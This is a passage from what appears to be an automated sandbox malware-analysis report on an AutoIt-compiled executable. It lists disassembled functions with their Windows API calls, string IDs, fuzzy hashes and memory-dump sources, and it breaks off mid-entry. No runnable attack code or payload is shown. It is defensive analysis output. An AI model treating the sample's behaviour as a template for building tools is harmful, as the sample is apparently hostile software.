                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __snwprintf_memmove
                                                                                                                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                              • API String ID: 3506404897-2584243854
                                                                                                                                                                              • Opcode ID: bdcc66df0f5856123e9901ad806487855f4b52c4f77c2da6277b6711631b4eea
                                                                                                                                                                              • Instruction ID: 6fa9dff6919a5cc677bb218059d68f63a330637b474f1bdc53337b0e13c2da55
                                                                                                                                                                              • Opcode Fuzzy Hash: bdcc66df0f5856123e9901ad806487855f4b52c4f77c2da6277b6711631b4eea
                                                                                                                                                                              • Instruction Fuzzy Hash: B3218D71600219AACF10EFA5C882EEE7BB5FF44704F00485AF505AB182DB75EE56CBB5
                                                                                                                                                                              Function 005191DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00519269
                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00519274
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: Combobox
                                                                                                                                                                              • API String ID: 3850602802-2096851135
                                                                                                                                                                              • Opcode ID: ea81d3ded665def699a888c703b2dac47a48ba3d080b0fb38655f76ad3a15379
                                                                                                                                                                              • Instruction ID: 46529419be7703d818b7288ed2e6ecea8706655c78ecaf2736c22d891f958080
                                                                                                                                                                              • Opcode Fuzzy Hash: ea81d3ded665def699a888c703b2dac47a48ba3d080b0fb38655f76ad3a15379
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A11E675300208BFFF118E54DC91EEB3BAAFB993A4F104124F92897290D635DC909BA0
                                                                                                                                                                              Function 0051970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                                                                                                                                                • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                                                                                                                                                • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00519775
                                                                                                                                                                              • GetSysColor.USER32(00000012), ref: 0051978F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                              • String ID: static
                                                                                                                                                                              • API String ID: 1983116058-2160076837
                                                                                                                                                                              • Opcode ID: 114ca6ee96d99df717d22644e5ebe078f61ebdffd51a6b4d797bd7689eaa8767
                                                                                                                                                                              • Instruction ID: 5d99e655dd0dd94908804268eb7e22e8e309c9dfd0342f3456e7de79314aa4ae
                                                                                                                                                                              • Opcode Fuzzy Hash: 114ca6ee96d99df717d22644e5ebe078f61ebdffd51a6b4d797bd7689eaa8767
                                                                                                                                                                              • Instruction Fuzzy Hash: 13115972520209AFEB04DFB8D846EFA7BB8FF09304F040929F956D3280D634E891DB60
                                                                                                                                                                              Function 00519424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 005194A6
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005194B5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                                                                                                              • String ID: edit
                                                                                                                                                                              • API String ID: 2978978980-2167791130
                                                                                                                                                                              • Opcode ID: 8c1be1ab0caaac9ce5f1d50a6bad634625e96a7dba34759935d3b8333ea4955e
                                                                                                                                                                              • Instruction ID: f932f623e2e86a431993c14aa103985e7fefc703bd89654a405a3d8d9c102f87
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c1be1ab0caaac9ce5f1d50a6bad634625e96a7dba34759935d3b8333ea4955e
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A115B71100204ABFF108E64AC95EEB3B69FB15378F104724F965931D0C7B59C96ABA1
                                                                                                                                                                              Function 004F5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004F5CF3
                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004F5D12
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                                                                                              • Opcode ID: c3aaafe2069c2ba77d1ccd94f3d934dc5ed693c9fa3841276cb706265e02acb4
                                                                                                                                                                              • Instruction ID: 28a035e9e8d1587cfa73f6ba02fc4350920896900ad57851a0d6a53f687d6bf2
                                                                                                                                                                              • Opcode Fuzzy Hash: c3aaafe2069c2ba77d1ccd94f3d934dc5ed693c9fa3841276cb706265e02acb4
                                                                                                                                                                              • Instruction Fuzzy Hash: 5711D671902A1CABEB20DB5CE848BBA77F8DB05344F144012EF55E7290D3749D05D799
                                                                                                                                                                              Function 005053F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0050544C
                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00505475
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$OpenOption
                                                                                                                                                                              • String ID: <local>
                                                                                                                                                                              • API String ID: 942729171-4266983199
                                                                                                                                                                              • Opcode ID: 2213712dacd397a9388cbd15499aa5e345b39bf53e78634d48c75640248345ca
                                                                                                                                                                              • Instruction ID: a009ef07ff927178171e68ec01a46f0f5b44f103900767e4ed6004f4eed6efdd
                                                                                                                                                                              • Opcode Fuzzy Hash: 2213712dacd397a9388cbd15499aa5e345b39bf53e78634d48c75640248345ca
                                                                                                                                                                              • Instruction Fuzzy Hash: 94119E70541A21BADF258F618884EEFBEA8FF12752F10862AF54556080F270A984DEB0
                                                                                                                                                                              Function 004DB4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004E4557
                                                                                                                                                                              • ___raise_securityfailure.LIBCMT ref: 004E463E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                              • String ID: (W
                                                                                                                                                                              • API String ID: 3761405300-2310960208
                                                                                                                                                                              • Opcode ID: 4753c8a2e4f592209d55768386597b78d92cb94d5c241885fd2bb8140b4e75dc
                                                                                                                                                                              • Instruction ID: a86798b25f633c7aae11c23cb5bb703a0dc1b9bcb5ae5fd8b1d34a9eb5619c86
                                                                                                                                                                              • Opcode Fuzzy Hash: 4753c8a2e4f592209d55768386597b78d92cb94d5c241885fd2bb8140b4e75dc
                                                                                                                                                                              • Instruction Fuzzy Hash: 3821EFB5510204DBD750DF59F995A417BE8AB68314F10682AE9098A3E0E3F469C8FF49
                                                                                                                                                                              Function 0050ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0050ACF5
                                                                                                                                                                              • htons.WSOCK32(00000000,?,00000000), ref: 0050AD32
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: htonsinet_addr
                                                                                                                                                                              • String ID: 255.255.255.255
                                                                                                                                                                              • API String ID: 3832099526-2422070025
                                                                                                                                                                              • Opcode ID: 78783085417e4b234a0f7a82bf4a61521b8ff9dcf7b2b120f8fd0b84cd568e1b
                                                                                                                                                                              • Instruction ID: c56905aa418f1625e91a3face952fd55f1c0ed09e40b3d485e21a3fcc4123356
                                                                                                                                                                              • Opcode Fuzzy Hash: 78783085417e4b234a0f7a82bf4a61521b8ff9dcf7b2b120f8fd0b84cd568e1b
                                                                                                                                                                              • Instruction Fuzzy Hash: 1B01D236600305ABCB20AFB4D846FADBB74FF54724F10851AFA159B2D1D671E804C765
                                                                                                                                                                              Function 004EC577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004EC5E5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                                                                              • Opcode ID: 622093d766ccbf37634d8e3818223bbecdbf909da78e34a85f4f28cef8a1df3b
                                                                                                                                                                              • Instruction ID: b60727fbae51541f6c31436a6d6bdcf16f7cae8a266d04f6d90db866a9381da7
                                                                                                                                                                              • Opcode Fuzzy Hash: 622093d766ccbf37634d8e3818223bbecdbf909da78e34a85f4f28cef8a1df3b
                                                                                                                                                                              • Instruction Fuzzy Hash: BF01F931501154ABCB04EB96CC919FF776AAB06311B140A1AF462A33C1DB7858099764
                                                                                                                                                                              Function 004FC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __fread_nolock_memmove
                                                                                                                                                                              • String ID: EA06
                                                                                                                                                                              • API String ID: 1988441806-3962188686
                                                                                                                                                                              • Opcode ID: 41c600a1850bb2b9167cbe285e4e80419494bb3d3182f38a1526780a1427ba6e
                                                                                                                                                                              • Instruction ID: 71ca61386ad2492a36181cb4d1d32907e07af16c7ae783b298bc3dd1e9610042
                                                                                                                                                                              • Opcode Fuzzy Hash: 41c600a1850bb2b9167cbe285e4e80419494bb3d3182f38a1526780a1427ba6e
                                                                                                                                                                              • Instruction Fuzzy Hash: 3A01F9719002187EDB18CB99C856FBE7BF89B05315F00415FE153D2281E478A708CB60
                                                                                                                                                                              Function 004EC473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 004EC4E1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                                                                              • Opcode ID: 2d19c44ce9c28204de41f831ed4c8202cf89f03ff83dc73864cb70f2d23bcecd
                                                                                                                                                                              • Instruction ID: d944da55ce0eb37d12f00b8a75131cb111d10511cbd648008a187963feecd047
                                                                                                                                                                              • Opcode Fuzzy Hash: 2d19c44ce9c28204de41f831ed4c8202cf89f03ff83dc73864cb70f2d23bcecd
                                                                                                                                                                              • Instruction Fuzzy Hash: C801F771641108ABCB14EB92C9A2EFF77B99F05305F14001AB503E32C1DA585E09A279
                                                                                                                                                                              Function 004EC4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 004EC562
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                                                                              • Opcode ID: 11dff895fe0ab6448a34d376a3045cfd88d4f97fceab4bda779c62eaae596ac6
                                                                                                                                                                              • Instruction ID: 31106e36211e2613e0224c8e62076931ffcdfe1a76f522171e7b0efd1ecac0ad
                                                                                                                                                                              • Opcode Fuzzy Hash: 11dff895fe0ab6448a34d376a3045cfd88d4f97fceab4bda779c62eaae596ac6
                                                                                                                                                                              • Instruction Fuzzy Hash: 8D01A7716411187BCB14E796C992FFF77A95B15706F24041AB403E32C1DA589E0AA379
                                                                                                                                                                              Function 004F804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassName_wcscmp
                                                                                                                                                                              • String ID: #32770
                                                                                                                                                                              • API String ID: 2292705959-463685578
                                                                                                                                                                              • Opcode ID: 4a17ca8f85e1ca572d9888847e76f365c65d41b08ca8cf8f82ee278c1f405d82
                                                                                                                                                                              • Instruction ID: 6898743986aa1d32a2b9e79f8346bc544c099b604c5109f1225ba51691646f89
                                                                                                                                                                              • Opcode Fuzzy Hash: 4a17ca8f85e1ca572d9888847e76f365c65d41b08ca8cf8f82ee278c1f405d82
                                                                                                                                                                              • Instruction Fuzzy Hash: 05E0D13360022927D720DA55EC0AE97FB7DF751764F00001BF514D3141D7B4964587D4
                                                                                                                                                                              Function 004DDA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __umatherr.LIBCMT ref: 004DDA2A
                                                                                                                                                                                • Part of subcall function 004DDD86: __ctrlfp.LIBCMT ref: 004DDDE5
                                                                                                                                                                              • __ctrlfp.LIBCMT ref: 004DDA47
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __ctrlfp$__umatherr
                                                                                                                                                                              • String ID: xnR
                                                                                                                                                                              • API String ID: 219961500-3686307339
                                                                                                                                                                              • Opcode ID: 3c1cf1dd0556efb6126c0bee8f7890bc4706f489f4f769aae79fa3c55190e43b
                                                                                                                                                                              • Instruction ID: 749fd0049311397a8c89306f87b4dc058bdf9b5ee470f2f306693c168a8086d8
                                                                                                                                                                              • Opcode Fuzzy Hash: 3c1cf1dd0556efb6126c0bee8f7890bc4706f489f4f769aae79fa3c55190e43b
                                                                                                                                                                              • Instruction Fuzzy Hash: 02E0657140860AAADF017F81E8066A93BA5EF14314F80409AF58C14296DFB645B4D75B
                                                                                                                                                                              Function 004EB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004EB36B
                                                                                                                                                                                • Part of subcall function 004D2011: _doexit.LIBCMT ref: 004D201B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message_doexit
                                                                                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                              • API String ID: 1993061046-4017498283
                                                                                                                                                                              • Opcode ID: ca867abc706742a5993faa2ec1635044ec85fac8179d1345710c987e132239f3
